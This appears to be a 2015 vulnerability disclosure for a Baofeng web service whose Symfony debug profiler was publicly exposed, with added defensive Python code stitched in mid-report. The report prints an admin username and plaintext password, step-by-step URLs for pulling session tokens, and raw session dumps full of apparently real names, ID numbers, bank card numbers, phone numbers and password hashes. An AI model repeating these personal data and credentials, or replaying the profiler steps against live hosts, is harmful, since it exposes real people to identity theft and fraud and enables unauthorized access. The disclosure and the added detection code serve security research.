Vulnerability details

Disclosure status:

2015-07-14: Details reported to the vendor, awaiting the vendor's response
2015-07-15: Vendor has confirmed; details disclosed to the vendor only
2015-07-25: Details disclosed to core white hats and experts in the relevant field
2015-08-04: Details disclosed to regular white hats
2015-08-14: Details disclosed to intern white hats
2015-08-29: Details disclosed to the public

Brief description:

Can lead to exposure of some users' data (name / bank card number / mobile number / email / plaintext password).
But I think, since the admin account's plaintext password has already been captured, everything else is only a matter of time.

Detailed description:

The site is built on the Symfony framework with an insecure configuration.
Backend address: http://union.baofeng.com/login
Captured the admin account's password:

Key           Value
_password     "wangnan123"
_target_path  "/admin/"
_username     "bfwangnan"


[Screenshot: 2015-07-14 18:35:24的屏幕截图.png]


[Screenshot: 2015-07-14 18:35:38的屏幕截图.png]


The most painful part of this hole is the waiting, but with the admin account already in hand there is no need to wait any longer.
Browse this page: http://union.baofeng.com/_profiler/empty/search/results?limit=100
The key piece of information is the token in the first row.
Use that token to open http://union.baofeng.com/_profiler/b616dc
i.e. append the token after _profiler.
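The defender's counterpart to the steps above is a self-check that tells you whether the profiler's search endpoint is reachable on a host you operate, without opening any of the listed requests. The following is an added example and not code from the report; it assumes only the Python 3 standard library, the search path quoted in the report, and the 6-hex-character token format Symfony's Profiler generates (the b616dc / 60e43b style tokens seen above). The HTML sample at the bottom is constructed for the offline run, not a real capture.

```python
"""Self-check for an exposed Symfony web profiler (added example, not code from
the report). In a correctly configured production deployment the /_profiler
routes are not registered, so the search endpoint the report uses answers 404.
A 200 whose body links to /_profiler/<token> means the debug tooling, and with
it every recent request's session token, is reachable from the internet."""
import re
import urllib.error
import urllib.request

SEARCH_PATH = "/_profiler/empty/search/results?limit=1"
# Profiler tokens are the first 6 hex chars of a sha256 (Profiler::collect),
# which matches the b616dc / 60e43b style tokens quoted in the report.
TOKEN_RE = re.compile(r"/_profiler/([0-9a-f]{6})(?![0-9a-f])")


def classify(status, body):
    """Map an HTTP status and body to a finding a responder can act on."""
    if status == 404:
        return "not exposed"
    if status in (401, 403):
        return "exposed but access-controlled"
    if status == 200 and TOKEN_RE.search(body):
        return "EXPOSED: profiler lists request tokens"
    if status == 200 and "profiler" in body.lower():
        return "EXPOSED: profiler UI reachable"
    return "inconclusive (HTTP %d)" % status


def extract_tokens(body):
    """Tokens present in a profiler search page; counted, never opened."""
    return sorted(set(TOKEN_RE.findall(body)))


def fetch(base_url, timeout=10):
    """GET the profiler search page on a host you operate; returns (status, body)."""
    url = base_url.rstrip("/") + SEARCH_PATH
    req = urllib.request.Request(url, headers={"User-Agent": "profiler-exposure-self-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:       # 404 / 403 arrive as exceptions
        return err.code, err.read().decode("utf-8", "replace")
    except urllib.error.URLError:               # unreachable host: inconclusive
        return 0, ""


# Constructed stand-in for a profiler search result page (not a real capture).
CONSTRUCTED_EXPOSED_HTML = """<table>
<tr><td><a href="/_profiler/b616dc">b616dc</a></td><td>203.0.113.10</td><td>GET</td><td>/admin/</td></tr>
<tr><td><a href="/_profiler/60e43b">60e43b</a></td><td>203.0.113.11</td><td>POST</td><td>/login_check</td></tr>
</table>"""

if __name__ == "__main__":
    import sys
    status, body = fetch(sys.argv[1]) if len(sys.argv) > 1 else (200, CONSTRUCTED_EXPOSED_HTML)
    print(classify(status, body), "| tokens listed:", len(extract_tokens(body)))
```

Run it with the base URL of a host you are responsible for; without an argument it evaluates the constructed sample. The expected result for a production host is "not exposed": in the Symfony Standard Edition of this era, WebProfilerBundle is registered in AppKernel::registerBundles() only for the dev and test environments, and the _wdt and _profiler routes are imported only by app/config/routing_dev.yml, so a production front controller never serves them. Serving app_dev.php to the public, or registering the bundle unconditionally, re-exposes every profiled request's security token, which is exactly what the report goes on to show. Profiler data also persists on disk under the cache directory, so rotating the affected sessions and clearing that storage belongs to the clean-up.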
I'll list a few: 姜兆勇 [email protected] 15996110393 320723198510192617 6217001280001247353
http://union.baofeng.com/_profiler/60e43b

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2385:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2335:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:25650;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920031388542";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:9:"pierjiang";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"040b96942b3bc38647365171c4e05ea8";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"15996110393";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"姜兆勇";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:61645804;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:2240;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:2;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:25:"ROLE_SITE_OWNER,ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1394679128;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1394763193;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436867562;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:3:"CCB";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:18;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:129;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:27:"连云港海棠路分理处";s:44:"u0000Baofeng\NvwaBund
le\Entity\Useru0000account_card";s:19:"6217001280001247353";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:9:"姜兆勇";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:18:"320723198510192617";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:2:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SITE_OWNER";}i:1;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"


[Screenshot: 2015-07-14 18:06:51的屏幕截图.png]

[Screenshot: 2015-07-14 18:02:27的屏幕截图.png]


http://union.baofeng.com/_profiler/79e874
秦嘉成 445321198507235214 [email protected] 18620909778 557decc0bfc6ef3dcfeaf4f9f05819af

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2220:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2170:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:29720;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920065572877";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:7:"ken1288";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"557decc0bfc6ef3dcfeaf4f9f05819af";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"18620909778";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"秦嘉成";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:31817884;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:90;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:1;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:9:"ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1428939059;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1429510375;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866632;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:3:"BOC";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:27;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:250;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:18:"广州羊城支行";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000accou
nt_card";s:19:"6227003320750325120";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:9:"秦嘉成";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:18:"445321198507235214";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:1:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"


http://union.baofeng.com/_profiler/e6a93e

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":3354:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:3304:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:20971;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920019788257";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:10:"bfwangnan ";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"9c0ac866ba42e7fe3c10b803f624534f";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:19:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:10:"1235414321";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:10:"bfwangnan ";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:9;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:135:"ROLE_SUPER_ADMIN,ROLE_USER_ADMIN,ROLE_FINANCE,ROLE_STATS,ROLE_SITE_ADMIN,ROLE_PAGE_EDITOR,ROLE_PAGE_ADMIN,ROLE_BD_ADMIN,ROLE_SHOP_ADMIN";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1375266262;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:1;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:1428377095;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:20971;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866861;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:0:"";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:0;s
:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_card";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:0:"";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:0:"";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:9:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:16:"ROLE_SUPER_ADMIN";}i:1;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_USER_ADMIN";}i:2;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:12:"ROLE_FINANCE";}i:3;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:10:"ROLE_STATS";}i:4;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SITE_ADMIN";}i:5;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:16:"ROLE_PAGE_EDITOR";}i:6;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_PAGE_ADMIN";}i:7;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:13:"ROLE_BD_ADMIN";}i:8;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SHOP_ADMIN";}}i:3;a:0:{}}";}}"


http://union.baofeng.com/_profiler/40f295
冯晶晶 [email protected] 798c089807b2ec3ff4d67a34f436185c 18201659496

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2191:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2141:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:28800;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920055985064";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:16:"zhuangjilianmeng";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"798c089807b2ec3ff4d67a34f436185c";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"18201659496";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"冯晶晶";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:26756774;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:60420;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:1;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:9:"ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1421980882;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:1421997796;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:20971;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1421996666;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866778;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:0:"";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:0;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\U
seru0000account_card";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:0:"";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:0:"";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:0.40000000000000002;}i:1;b:1;i:2;a:1:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"
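What the dumps above actually contain is easier to see with a reader for the format. Each _profiler page exposes the session's UsernamePasswordToken in PHP serialize() form: an outer C: custom object whose payload is itself serialized (credentials, firewall name, parent token), with the User entity and its Role objects nested one level deeper. The following is an added example, not code from the report or from Symfony: a minimal PHP-unserialize walker that never instantiates a class, plus an inventory function that lists which entity properties and roles left the server while redacting the values. The token it runs on is constructed with placeholder values in the page's layout; note that where the page shows "u0000" the real data carries a NUL byte (PHP's protected-property mangling), which is what the parser expects.

```python
# Added example, not the report's code. Property names treated as sensitive when non-empty.
SENSITIVE = {"password", "identity_no", "account_card", "phone", "email", "realname", "account_name"}


class PhpUnserializer:
    """Reader for PHP serialize() tags N/i/d/b/s/a/O/C; strings stay bytes."""
    def __init__(self, data):
        self.d, self.i = data, 0
    def _take(self, tok):                      # consume an expected literal
        if not self.d.startswith(tok, self.i):
            raise ValueError("expected %r at offset %d" % (tok, self.i))
        self.i += len(tok)
    def _until(self, ch):                      # bytes up to ch; ch consumed
        end = self.d.index(ch, self.i)
        raw, self.i = self.d[self.i:end], end + 1
        return raw
    def _raw(self, n):                         # exactly n bytes (PHP lengths are bytes)
        raw, self.i = self.d[self.i:self.i + n], self.i + n
        return raw
    def parse(self):
        tag = self._raw(1)
        if tag == b"N":                        # N;
            self._take(b";")
            return None
        self._take(b":")
        if tag in (b"i", b"d", b"b"):          # i:25650;  d:0.4;  b:1;
            raw = self._until(b";")
            return int(raw) if tag == b"i" else float(raw) if tag == b"d" else raw == b"1"
        if tag not in (b"s", b"a", b"O", b"C"):
            raise ValueError("unknown tag %r at offset %d" % (tag, self.i))
        n = int(self._until(b":"))             # string length, element count or class-name length
        if tag == b"s":                        # s:<len>:"...";
            self._take(b'"')
            raw = self._raw(n)
            self._take(b'";')
            return raw
        if tag in (b"O", b"C"):                # O:<len>:"Class":<n>:{...}  /  C:<len>:"Class":<n>:{...}
            self._take(b'"')
            cls = self._raw(n).decode()
            self._take(b'":')
            n = int(self._until(b":"))
        self._take(b"{")
        if tag == b"C":                        # custom payload: raw bytes the caller unserializes again
            payload = self._raw(n)
            self._take(b"}")
            return {"class": cls, "payload": payload}
        out = {}
        for _ in range(n):                     # a: int/bytes keys; O: b"\0Class\0name" for protected props
            key = self.parse()
            out[key.split(b"\x00")[-1].decode() if tag == b"O" else key] = self.parse()
        self._take(b"}")
        return {"class": cls, "props": out} if tag == b"O" else out


def inventory(token_bytes):
    """What a serialized UsernamePasswordToken discloses; sensitive values redacted."""
    outer = PhpUnserializer(token_bytes).parse()
    custom = PhpUnserializer(outer["payload"]).parse()   # [credentials, firewall, parent::serialize()]
    parent = PhpUnserializer(custom[2]).parse()          # [user, authenticated, roles, attributes]
    user, fields = parent[0], {}
    for name, value in user["props"].items():
        if name in SENSITIVE and value not in (None, b""):
            fields[name] = "<redacted>"
        else:
            fields[name] = value.decode("utf-8", "replace") if isinstance(value, bytes) else value
    return {"firewall": custom[1].decode(), "credentials_erased": custom[0] is None,
            "user_class": user["class"], "authenticated": parent[1],
            "roles": [r["props"]["role"].decode() for r in parent[2].values()],
            "fields": fields,
            "sensitive_fields_present": [n for n, v in fields.items() if v == "<redacted>"]}


# Constructed sample in the page's layout (placeholder values, not real users).
USER_CLASS = "Baofeng\\NvwaBundle\\Entity\\User"
ROLE_CLASS = "Symfony\\Component\\Security\\Core\\Role\\Role"
TOKEN_CLASS = "Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken"

def php_str(v):                                # s:<byte length>:"...";
    b = v if isinstance(v, bytes) else v.encode("utf-8")
    return b's:%d:"%s";' % (len(b), b)
def php_object(cls, props):                    # O:<len>:"Class":<n>:{"\0Class\0prop" value ...}
    body = b"".join(php_str("\x00%s\x00%s" % (cls, k)) + v for k, v in props.items())
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(props), body)
def php_array(items):                          # a:<n>:{i:0;value i:1;value ...}
    return b"a:%d:{%s}" % (len(items), b"".join(b"i:%d;" % i + v for i, v in enumerate(items)))

_user = php_object(USER_CLASS, {
    "id": b"i:1;", "username": php_str("example_user"),
    "password": php_str("0" * 32),             # 32 hex chars, the width of the hashes on the page
    "email": php_str("user@example.com"), "phone": php_str("0" * 11),
    "realname": php_str("示例用户"),           # multi-byte: PHP lengths count bytes, not characters
    "identity_no": php_str("0" * 18), "account_card": php_str("0" * 19),
    "account_name": php_str(""), "balance": b"i:2240;"})   # empty string: present but not leaked
_roles = php_array([php_object(ROLE_CLASS, {"role": php_str(r)}) for r in ("ROLE_SITE_OWNER", "ROLE_USER")])
_parent = php_array([_user, b"b:1;", _roles, b"a:0:{}"])
_custom = php_array([b"N;", php_str("secured_area"), php_str(_parent)])
CONSTRUCTED_TOKEN = b'C:%d:"%s":%d:{%s}' % (len(TOKEN_CLASS), TOKEN_CLASS.encode(), len(_custom), _custom)

if __name__ == "__main__":
    for key, val in inventory(CONSTRUCTED_TOKEN).items():
        print("%-25s %s" % (key, val))
```

Two details of the structure matter for triage. The first element of the custom payload is N, because Symfony erases the plaintext credentials before the token is serialized into the session; the password hash, identity number and bank card fields are nonetheless present because the whole User entity is stored in the token, so every user who had a request profiled is affected, not only those who logged in during the exposure window. Feeding a real dump to inventory() requires the raw bytes (NUL separators intact), not the HTML-rendered text with "u0000".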

Proof of vulnerability:

[Screenshot: 2015-07-14 18:35:24的屏幕截图.png]

[Screenshot: 2015-07-14 18:35:38的屏幕截图.png]

[Screenshot: 2015-07-14 18:06:51的屏幕截图.png]

[Screenshot: 2015-07-14 18:02:27的屏幕截图.png]

Remediation:

You know what to do!

Tags: none